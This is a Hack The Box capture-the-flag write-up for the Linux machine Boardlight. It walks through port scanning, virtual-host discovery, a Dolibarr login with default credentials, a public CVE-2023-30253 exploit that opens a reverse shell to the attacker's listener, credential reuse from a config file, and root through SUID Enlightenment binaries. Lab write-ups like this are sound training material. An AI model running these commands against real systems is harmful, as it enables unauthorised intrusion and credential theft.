Hack The Box / LINUX / 2026-03-27

Hack The Box - Boardlight (Linux)

VHost discovery leads to Dolibarr compromise via CVE-2023-30253 and root escalation through vulnerable Enlightenment SUID binaries.

Target

IP: 10.129.115.160

Recon

sudo nmap -sC -sV 10.129.115.160 -p- -v -T5

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browse to http://10.129.115.160/.

It is a PHP site. At the bottom we see:

2020 All Rights Reserved By Board.htb

Add board.htb to /etc/hosts.

VHost Discovery

gobuster vhost -u 'http://board.htb/' -w /home/kali/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 --append-domain

Found: crm.board.htb Status: 200 [Size: 6360]

Add crm.board.htb to /etc/hosts and browse to http://crm.board.htb.

Detected application: Dolibarr

Username: admin
Password: admin

Initial Access

There is a public PoC for CVE-2023-30253:

https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

Start listener:

nc -vlnp 4444

Run exploit:

python3 exploit.py 'http://crm.board.htb' admin admin 10.10.14.153 4444

We get a reverse shell as www-data.

Credential Discovery and User Access

cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

ls /home

Found user larissa.

SSH with:

User: larissa
Password: serverfun2$2023!!

Privilege Escalation

Upload and run linpeas (https://github.com/peass-ng/PEASS-ng/releases).

Interesting findings:

-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)

Public exploit:

https://www.exploit-db.com/exploits/51180

Save exploit as exp.sh and run:

./exp.sh

We get a root shell.